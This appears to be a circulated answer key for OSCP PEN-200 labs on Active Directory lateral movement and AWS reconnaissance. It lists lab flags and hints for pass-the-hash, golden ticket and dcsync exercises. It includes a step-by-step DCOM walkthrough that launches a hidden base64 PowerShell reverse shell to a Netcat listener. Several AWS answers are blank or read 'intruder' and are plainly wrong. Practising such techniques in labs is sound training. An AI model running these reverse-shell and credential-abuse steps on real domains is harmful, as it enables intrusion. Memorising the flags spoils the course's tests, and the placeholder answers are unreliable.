Similar to PsExec, this technique requires an SMB connection through the firewall and the Windows File and Printer
Sharing feature to be enabled.
Command
2. Start VM Group 2 and try to execute the pass the hash technique to move laterally to web04 to get the flag located on
the administrator's desktop.
Answer
OS{47b670d16f08da715ac2bb9cde3d5b3e}
View hints
HINT
In this exercise, remember that we need to gain access to WEB04. Use the same hash provided in listing 16 in this
learning unit.
Command
23.1.4. Overpass the Hash
Lateral Movement in Active Directory - Overpass the Hash - VM Group 1
Lateral Movement in Active Directory - Overpass the Hash - VM Group 2
Labs
1. Start VM Group 1 and repeat the steps discussed in this section. Which command is used to inspect the current TGT
available for the running user?
Answer
klist
View hints
HINT
1. While repeating the steps in this learning unit, remember to simulate the cached credential scenario as shown.
2. Review the command used in listing 19 to answer this question.
OSCP PEN-200 336
Command
2. Start VM Group 2 and try to execute the overpass the hash technique to move laterally to web04 to get the flag
located on the Administrator's desktop. To do so, connect to CLIENT76 via RDP as the offsec user and use the NTLM
hash obtained in a previous Module.
Answer
OS{366ef933917c418c5e9a40da47182a98}
View hints
HINT
1. Administrator's NTLM hash was provided in listing 16 in the "Pass The Hash" learning unit.
2. Ensure that you execute PowerShell with administrative privileges. Note: You can find all the necessary tools in
the C:\tools directory.
Command
OSCP PEN-200 337
shu commandlardan keyin web04 powersheli ochiladi
OSCP PEN-200 338
23.1.5. Pass the Ticket
Lateral Movement in Active Directory - Pass the Ticket - VM Group 1
Labs
1. Start VM Group 1 and try to execute the pass the ticket technique as illustrated in this section by first logging in to
CLIENT76 as
jen. Try to move laterally to web04 to get the flag located in the shared folder.
Answer
OS{8b19d69d079958915e201e2858751ec6}
View hints
HINT
1. RDP to CLIENT76 as jen user.
2. Follow the steps outlined in this learning unit.
3. You can use the command provided in listing 28 to list the content in the share. To read the flag, use the 'type'
command.
Command
OSCP PEN-200 339
OSCP PEN-200 340
23.1.6. DCOM
Lateral Movement in Active Directory - DCOM - VM Group 1
Lateral Movement in Active Directory - DCOM - VM Group 2
Labs
1. Start VM Group 1 and repeat the steps discussed in this section. Which MMC method accepts command shell
arguments?
Answer
ExecuteShellCommand
View hints
HINT
OSCP PEN-200 341
You may want to review Ref Link #9 to recall the method used in the course.
Command
2. Start VM Group 2 and connect as the jen user on client74 then try to abuse DCOM to move laterally to web04 to get
the flag located on the administrator's desktop.
Answer
OS{50d49f4d49aa3413c2dbf80398fdc894}
View hints
HINT
Use the encoded PS command similar to what we did in the WMI and WinRM section earlier in this Module and add
a reverse-shell as a DCOM payload.
Command
1. Start VM Group 2 and log in to CLIENT74 as the jen user.
2. Prepare the Reverse Shell:
Use a Python script to generate a base64 encoded PowerShell command for a reverse shell. The command
should look something like this:
powershell -nop -w hidden -e <base64_encoded_command>
Replace <base64_encoded_command> with your actual encoded command.
encode.py
OSCP PEN-200 342
3. Set Up a Listener:
On your Kali machine, set up a Netcat listener on the port you plan to use (e.g., port 443):
nc -lnvp 443
4. Instantiate the DCOM Object:
In an elevated PowerShell prompt on CLIENT74, run the following command to create a DCOM object
targeting WEB04:
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<WEB
04_IP>"))
Replace <WEB04_IP> with the actual IP address of WEB04.
5. Execute the Reverse Shell Command:
Use the ExecuteShellCommand method to run your encoded PowerShell command:
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"<your_encoded_command
>","7")
Replace <your_encoded_command> with the base64 encoded command you generated earlier.
6. Verify the Connection:
Check your Netcat listener on Kali to confirm that you have received a connection from WEB04.
7. Access the Flag:
Once you have a reverse shell, navigate to the administrator's desktop on WEB04 and retrieve the flag.
OSCP PEN-200 343
23.2.1. Golden Ticket
Lateral Movement in Active Directory - Golden Ticket - VM Group 1
Lateral Movement in Active Directory - Golden Ticket - VM Group 2
Labs
1. Start VM Group 1 and repeat the steps discussed in this section. Which user's NTLM hash do we need to abuse in
order to forge a golden ticket?
Answer
krbtgt
View hints
HINT
Follow the steps in this learning unit. All necessary tools are located in the C:\Tools directory. Obtaining the krbtgt
password hash grants the ability to generate custom TGTs, often referred to as "golden tickets".
Command
2. Start VM Group 2 and try to execute the golden ticket persistence technique to get access to DC1 and get the flag
located on the administrator's desktop.
Answer
OS{cadeccd38a6337371e1f2d25c0f071d9}
View hints
HINT
1. RDP to client74 with the provided credentials, ensure that you specify the domain.
2. Reuse the krbtgt hash from the courseware.
Command
OSCP PEN-200 344
OSCP PEN-200 345
OSCP PEN-200 346
23.2.2. Shadow Copies
Lateral Movement in Active Directory - Shadow Copies and Domain Sync - VM Group 1
Lateral Movement in Active Directory - Shadow Copies and Domain Sync - VM Group 2
Lateral Movement in Active Directory - Capstone - VM Group 3
Lateral Movement in Active Directory - Capstone - VM Group 4
Labs
1. Start VM Group 1 and repeat the steps discussed in this section. During a shadow copy operation, what is the
designated name for the source location from which the
ntds.dit is copied?
Answer
Shadow copy device name
View hints
HINT
1. Carefully review Listing 41, paying close attention to the text highlighted in red.
Command
OSCP PEN-200 347
2. Capstone Exercise: Start VM Group 2 and try to execute the dcsync technique and get access to dc1 in order to get
the flag located on the administrator's desktop. To do so, log in via RDP as the jeffadmin and perform dcsync against
the domain Administrator user to obtain its NTLM hash.
Answer
OS{05827e0b03cd7d09890312a55a13416d}
View hints
HINT
1. You can find all the necessary tools such as mimikatz, Sysinternals in the C:\tools directory.
2. If mimikatz throws an error, it is beneficial to research the meaning of the error.
3. You may utilize impacket tools to get access to DC.
Command
OSCP PEN-200 348
3. Capstone Exercise: Once VM Group 3 is started, the domain corp.com has been modified. Log in as leon on
CLIENT74 and use the techniques discussed in this Module to move laterally and get the flag on FILES04
Administrator's desktop.
Answer
OS{09c691018ce88b2a16a7e0cc8e2aab31}
View hints
OSCP PEN-200 349
HINT
1. Once logged into CLIENT74, you are expected to figure out current users' groups and privileges.
2. Consider spraying the current user's credentials across the network to identify any potentially useful outcomes.
Command
4. Capstone Exercise: Once VM Group 4 is started, the domain corp.com has been modified. Log in as the leon user on
CLIENT76 and use the techniques discussed in this Module to move laterally and get the flag in the WEB04 shared
folder.
Answer
OS{c29c8b82bf8420396e1fc0e692cebecc}
View hints
HINT
1. Log into CLIENT76, assess the current users' privileges for administrator rights.
2. Review potential actions for lateral movement with the provided user.
3. For accessing to shared folder, leverage any cached hashes or tickets to your advantage.
Command
OSCP PEN-200 350
OSCP PEN-200 351
24. Enumerating AWS Cloud Infrastructure
24.2.2. Domain and Subdomain Reconnaissance
Labs
1. What command is used to query the authoritative DNS servers for the domain offseclab.io?
A) host -t ns offseclab.io
B) whois offseclab.io
C) dig offseclab.io
D) nslookup offseclab.io
Answer
View hints
no hints
OSCP PEN-200 352
Command
2. Which AWS service is very likely being used to manage the offseclab.io domain?
A) Amazon S3
B) Amazon EC2
C) Amazon Route 53
D) Amazon RDS
Answer
View hints
no hints
Command
3. Find the proof while gathering more info about the domain inside other commonly used DNS records.
Answer
OS{5423b7bd5cd992932326a72a647d2f57}
View hints
HINT
The proof is inside a record that is used to identify mail servers that are allowed to send emails on that domain.
Command
OSCP PEN-200 353
OSCP PEN-200 354
24.2.3. Service-specific Domains
Labs
1. What does the XML response indicate when received after removing the object key from the S3 URL?
A) The bucket does not exist
B) The bucket is publicly accessible and lists its contents
C) The bucket is fully private
D) The bucket is hosted on Azure
Answer
intruder
View hints
no hints
Command
no commands
2. Which custom URL is used by AWS for storing objects in S3 buckets?
A) azurewebsites.net
B) s3.amazonaws.com
C) storage.googleapis.com
D) web.core.windows.net
Answer
intruder
OSCP PEN-200 355
View hints
no hints
Command
no commands
3. Use the concepts we've learned to find other S3 buckets. We may want to build a dictionary around gemstones'
names as it is the theme that the target uses to name the projects. Assume that the format follows the
pattern offseclab-[gemstone]-[lab_assigned_random_value]. The proof resides in an object named proof.txt.
Answer
intruder
View hints
no hints
Command
no commands
Answer
intruder
View hints
no hints
Command
no commands
Answer
intruder
View hints
no hints
Command
no commands
Challenge Labs
OSCP PEN-200 356
You might also like
- Maze - Runner#0964: If You Want To Buy The Reports For Cheap Price DM Me On DiscordNo ratings yetMaze - Runner#0964: If You Want To Buy The Reports For Cheap Price DM Me On Discord33 pages
- @FsKnockouT-1. Active Directory Enumeration & AttacksNo ratings yet@FsKnockouT-1. Active Directory Enumeration & Attacks368 pages
- Pascha Mobile Mouse Server 9099 Metasploit Privilege Escalation Overwriting Service WindowsNo ratings yetPascha Mobile Mouse Server 9099 Metasploit Privilege Escalation Overwriting Service Windows5 pages
- [@Brianfabon] MS01v4 Unified ScreenshotsNo ratings yet[@Brianfabon] MS01v4 Unified Screenshots3 pages
- a598fdd3-e866-4e2c-8ccf-7d71c25106d6_HTB_-_Prolab_-_P.O.oNo ratings yeta598fdd3-e866-4e2c-8ccf-7d71c25106d6_HTB_-_Prolab_-_P.O.o25 pages
- Nagoya_Proving_Grounds_Practice_Walkthrough___Medium.pdfNo ratings yetNagoya_Proving_Grounds_Practice_Walkthrough___Medium.pdf20 pages
- Scripted Dish's Hashed HXBXBXBD BZBZBZBXBNo ratings yetScripted Dish's Hashed HXBXBXBD BZBZBZBXB1 page
- AD and Windows Exploitation Cheat SheetNo ratings yetAD and Windows Exploitation Cheat Sheet31 pages
- Student Workbook: Network Hardware: GlossaryNo ratings yetStudent Workbook: Network Hardware: Glossary5 pages
- 220270-use-cisco-ios-xe-hardening-guideNo ratings yet220270-use-cisco-ios-xe-hardening-guide70 pages
- DS-2CD6424FWD-10'20'30'40 2MP Covert Network Camera: Key FeaturesNo ratings yetDS-2CD6424FWD-10'20'30'40 2MP Covert Network Camera: Key Features3 pages
- Cisco ASA AnyConnect VPN 'Using CLI' - PeteNetLiveNo ratings yetCisco ASA AnyConnect VPN 'Using CLI' - PeteNetLive4 pages
- URL Vs URI: Most Important Differences You Must Know What Is The URL?No ratings yetURL Vs URI: Most Important Differences You Must Know What Is The URL?7 pages
- 14.3.5 - Basic Router Configuration Review-Herrera - Corona - IvanNo ratings yet14.3.5 - Basic Router Configuration Review-Herrera - Corona - Ivan6 pages
- 1.explain Hidden Station Problem in Wireless Networks?: Name-Mayank Saini USN - 1PE17EC075 CCN Assignment 2 Class - 6BNo ratings yet1.explain Hidden Station Problem in Wireless Networks?: Name-Mayank Saini USN - 1PE17EC075 CCN Assignment 2 Class - 6B22 pages
- 7393 - GCD1105 - ASM2 - Pham Thi Thanh Thien - GCD210520.No ratings yet7393 - GCD1105 - ASM2 - Pham Thi Thanh Thien - GCD210520.54 pages
- Free Ip Address Tracker (Ipat) : Reviewer'S GuideNo ratings yetFree Ip Address Tracker (Ipat) : Reviewer'S Guide10 pages
- Huawei CloudEngine S6730-H Series 10GE Switches DatasheetNo ratings yetHuawei CloudEngine S6730-H Series 10GE Switches Datasheet29 pages
